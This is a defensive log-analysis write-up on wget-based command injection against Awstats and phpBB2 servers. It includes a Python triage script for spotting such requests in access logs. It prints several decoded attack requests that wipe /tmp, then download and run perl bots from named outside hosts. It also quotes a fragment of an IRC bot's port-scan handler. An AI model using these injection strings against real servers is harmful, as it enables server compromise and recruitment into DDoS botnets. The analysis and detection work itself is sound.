After all the Awstats and PHPBB vulnerabilities, several of which use wget to fetch perl bots or other malware, it seemed like a good idea to grep httpd access logs for 'wget'. Another good place to look is the Snort alerts for SID 1330 ("WEB-ATTACKS wget command attempt"). We detected 47 instances of this SID from 23 unique source addresses between April 02 and April 16. The consolidated log file of wget strings is viewable here. There are a few extraneous results caused by loose search criteria; we will ignore these since they appear to be legitimate entries (such as a wget string in the referrer field rather than in the request itself).

Here is one of the earlier ones, which appears to have since been disabled (www.vpasp.go.ro now resolves to 127.0.0.1). The code has the target web server fetch a file whose name masquerades as a session ID string, perhaps to stay low-key in outgoing proxy logs, and then runs that file as a perl script. Unfortunately, since www.vpasp.go.ro resolves to localhost, we can't fetch the file to see its contents. A posting on Google Groups identified this URL as distributing the Backdoor.Perl.Shellbot.a malware, but little else is known. The same session ID can also be found on a Chilean web site's Awstats page. Our sympathy goes out to those administrators, who are apparently still running version 4.0 from April of 2002.

GET /awstats/awstats.pl?configdir=|echo; \
cd /tmp; rm -rf *; killall -9 perl; \
wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60; \
perl sess_3539283e27d73cae29fe2b80f9293f60; \
echo; echo|

Next, we stumble upon a trace left by Santy or a similar variant of code that exploits PHPBB2 vulnerabilities. The two remote servers have since been cleaned of bot.htm and ssh2.htm. The domains, file names, and sequence of events here are fairly well documented already, so we won't spend any time on this one.
GET /forums/viewtopic.php?t=63&rush=echo \
_START_; cd /tmp; mkdir .temp22; cd .temp22; \
wget http://www.quasi-sane.com/pics/bot.htm; \
wget http://weblicious.com/.notes/ssh2.htm; \
perl ssh2.htm; rm ssh.htm; perl bot.htm; \
rm bot.htm; echo _END_&highlight='.passthru \
($HTTP_GET_VARS[rush]).';

The remainder of the log file entries are attempts to fetch questionable content in the form of three text files (perl scripts written with LWP::Simple) from 61.85.234.215. Despite the 22 unique source IP addresses that submitted this malicious request to our web server, they always instruct us to download files from 61.85.234.215 (owned by KOREA TELECOM Internet Operating Center). This suggests that the source IPs are all infected with whatever worm or automated code is producing these logs, and that this Korean web server is the designated host for the source code. Here is the decoded (URL-unescaped) log file entry (view the link above for the unformatted version):

GET /forums/viewtopic.php?t=63&rush=echo \
_START_; cd /tmp; mkdir .temp; cd .temp; \
wget http://61.85.234.215/.zk/msn.txt; \
wget http://61.85.234.215/.zk/coll.txt; \
wget http://61.85.234.215/.zk/g.txt; \
perl msn.txt; rm msn.txt; perl coll.txt; rm coll.txt \
perl g.txt; rm g.txt; echo _END_ \
&highlight='.passthru($HTTP_GET_VARS[rush]).'

In contrast with the other instances, all of the remote files still exist, which gives us a trail to follow. Based on the similarities, we can without doubt cite the following links:
The last URL at milw0rm shows a very similar body of code, but directed at AltaVista's search engine. The msn.txt file spawns a process that searches for potential vulnerabilities using MSN's search; likewise, g.txt uses Google and Yahoo for the same purpose. Both files have 61.85.234.215 hard-coded into their source. A few seconds after being infected by this code, exploited web servers are searching for new targets using popular search engines, then commanding those machines to download the same three scripts from the Korean web server.

The third file, coll.txt, deserves a bit more attention. A web site in France has a post which shows a near-exact copy of the coll.txt script. The file acts as an IRC bot named coll, according to text in the script. It connects to eu.undernet.org and announces "Bot powered by DDOS TEAM" to the channel administrators ("RockYCroW", "El_S0mbra", and "kenshin"). Per the following function, coll.txt also accepts commands from the IRC channel, one of which is to perform a port scan against any host supplied as an argument (the variable names are Portuguese: portas = ports, aberta = open):

    # handler for the "portscan <host>" command received over IRC
    if ($funcarg =~ /^portscan (.*)/) {
        my $hostip="$1";
        my @portas=("21","22","23","25","53","80","110","143");
        my (@aberta, %porta_banner);
        foreach my $porta (@portas) {
            # a plain TCP connect() scan, four-second timeout per port
            my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
            if ($scansock) {
                push (@aberta, $porta);
                $scansock->close;
            }
        }

Then it reports back the open ports in a private message:

        if (@aberta) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
        }
    }
Perhaps more worrisome are the other functions of which coll.txt is capable. It can act as a remote shell that sends command output back to the other machines via IRC, transfer files to and from the local filesystem, and participate in DDoS attacks on request.

If wget must be installed on your web server, restricting execution of wget to the root user may prevent some of these actions. Regardless of which server vulnerability pops up next, if the exploit can only gain httpd privileges, it won't be able to fetch the rest of its toolkit using wget. Keep in mind, though, that this removes only one fetcher: curl, lynx, fetch, or perl with LWP::Simple (which these scripts already use) would serve just as well, so treat the restriction as a speed bump rather than a fix. Also, as we saw in this attack, a successful wget session in any of the requests shown here would probably leave wget's progress output (written to stderr) in the httpd error log. It is interesting that no one has begun redirecting STDOUT and STDERR to /dev/null in any of the attacks observed thus far.
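As an added example (not part of the original write-up), here is a small Python triage script that does the log search described at the top of this page more carefully than a plain grep: it parses Apache combined-format lines, URL-decodes only the request line so that a wget string in a referrer is not reported, pulls out the host each injected command tells the server to fetch from (the "many infected sources, one dropper host" view used above), and flags whether the attacker bothered to redirect output to /dev/null. The log lines embedded in it are constructed for the example: the client addresses, timestamps and the 198.51.100.7 entry are invented, and only the injected command strings mirror the ones quoted above.

```python
"""Triage Apache combined-format access logs for injected fetch commands.

Added example, not code from the write-up. Assumes the standard combined
log format and inspects only the request line, so a referrer such as
http://www.gnu.org/software/wget/ is not reported as a hit.
"""
import re
from urllib.parse import unquote_plus

# host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Fetchers used in the attacks above plus the usual substitutes. The tool must
# appear as a command word (start of string or after a shell separator); simple
# flags such as -q are skipped, and the argument stops at whitespace or the next
# separator. A flag that takes its own argument (-O file) defeats this pattern.
FETCHER_RE = re.compile(
    r'(?:^|[;|&`(\s])(wget|curl|fetch|lynx|links)\s+(?:-\S+\s+)*([^\s;|&]+)'
)
# The scheme may be missing, as in 'wget www.vpasp.go.ro/sess_...'.
URL_RE = re.compile(r'^(?:https?://)?([A-Za-z0-9][A-Za-z0-9.-]*)(?:/\S*)?$')
DEVNULL_RE = re.compile(r'>\s*/dev/null|2>&1')

# Constructed sample log: addresses, times and the 198.51.100.7 line are
# invented; the injected commands mirror the entries quoted in the write-up.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2005:02:14:51 -0500] "GET /awstats/awstats.pl?configdir=|echo;%20cd%20/tmp;%20rm%20-rf%20*;%20killall%20-9%20perl;%20wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;%20perl%20sess_3539283e27d73cae29fe2b80f9293f60;%20echo;%20echo| HTTP/1.1" 404 1234 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [05/Apr/2005:11:02:17 -0500] "GET /forums/viewtopic.php?t=63&rush=echo%20_START_;%20cd%20/tmp;%20mkdir%20.temp22;%20cd%20.temp22;%20wget%20http://www.quasi-sane.com/pics/bot.htm;%20wget%20http://weblicious.com/.notes/ssh2.htm;%20perl%20ssh2.htm;%20rm%20ssh.htm;%20perl%20bot.htm;%20rm%20bot.htm;%20echo%20_END_&highlight=%27.passthru(%24HTTP_GET_VARS%5Brush%5D).%27 HTTP/1.0" 200 8921 "-" "-"',
    '203.0.113.77 - - [09/Apr/2005:23:40:05 -0500] "GET /forums/viewtopic.php?t=63&rush=echo%20_START_;%20cd%20/tmp;%20mkdir%20.temp;%20cd%20.temp;%20wget%20http://61.85.234.215/.zk/msn.txt;%20wget%20http://61.85.234.215/.zk/coll.txt;%20wget%20http://61.85.234.215/.zk/g.txt;%20perl%20msn.txt;%20rm%20msn.txt;%20perl%20coll.txt;%20rm%20coll.txt%20perl%20g.txt;%20rm%20g.txt;%20echo%20_END_&highlight=%27.passthru(%24HTTP_GET_VARS%5Brush%5D).%27 HTTP/1.0" 200 8921 "-" "-"',
    '192.0.2.200 - - [12/Apr/2005:04:18:39 -0500] "GET /forums/viewtopic.php?t=63&rush=echo%20_START_;%20cd%20/tmp;%20mkdir%20.temp;%20cd%20.temp;%20wget%20http://61.85.234.215/.zk/msn.txt;%20wget%20http://61.85.234.215/.zk/coll.txt;%20wget%20http://61.85.234.215/.zk/g.txt;%20perl%20msn.txt;%20rm%20msn.txt;%20perl%20coll.txt;%20rm%20coll.txt%20perl%20g.txt;%20rm%20g.txt;%20echo%20_END_&highlight=%27.passthru(%24HTTP_GET_VARS%5Brush%5D).%27 HTTP/1.0" 200 8921 "-" "-"',
    # Legitimate request whose referrer contains 'wget': a plain grep hits it, this script does not.
    '198.51.100.3 - - [13/Apr/2005:15:09:22 -0500] "GET /downloads/index.html HTTP/1.1" 200 4532 "http://www.gnu.org/software/wget/" "Mozilla/5.0 (X11; Linux)"',
    # Invented entry showing what a quieter attacker (output to /dev/null) would look like.
    '192.0.2.33 - - [15/Apr/2005:08:55:01 -0500] "GET /cgi-bin/test.cgi?x=;wget%20http://198.51.100.7/x.txt%20%3E/dev/null%202%3E%261;perl%20x.txt HTTP/1.1" 500 0 "-" "-"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def find_fetches(line):
    """Return one finding per fetch command injected into the request line.

    Each finding is a dict with src (client address), tool, host (where the
    payload is hosted), url (the argument as given) and redirected (True if
    output was sent to /dev/null, so nothing would land in the httpd error log).
    """
    rec = parse_line(line)
    if rec is None:
        return []
    # Decode %20, %3B etc. so the injected command reads as the shell saw it.
    req = unquote_plus(rec['request'])
    findings = []
    for tool, target in FETCHER_RE.findall(req):
        u = URL_RE.match(target)
        if u is None:   # argument is not a URL/host (e.g. a file name after -O)
            continue
        findings.append({
            'src': rec['src'],
            'tool': tool,
            'host': u.group(1),
            'url': target,
            'redirected': bool(DEVNULL_RE.search(req)),
        })
    return findings


def summarize(lines):
    """Map each payload host to the set of client addresses that pointed us at it.

    One host with many sources indicates a worm or a shared toolkit rather than
    a single operator, which is the pattern seen with 61.85.234.215 above.
    """
    by_host = {}
    for line in lines:
        for f in find_fetches(line):
            by_host.setdefault(f['host'], set()).add(f['src'])
    return by_host


if __name__ == '__main__':
    for line in SAMPLE_LOG:
        for f in find_fetches(line):
            note = 'output redirected' if f['redirected'] else 'output would reach error_log'
            print(f"{f['src']} -> {f['tool']} {f['url']} ({note})")
    for host, srcs in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{host}: {len(srcs)} source(s)")
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's lines; the referrer-only entry produces no finding, the 61.85.234.215 host collects every source that sent the PHPBB2 request, and the invented /dev/null line is the only one flagged as redirected.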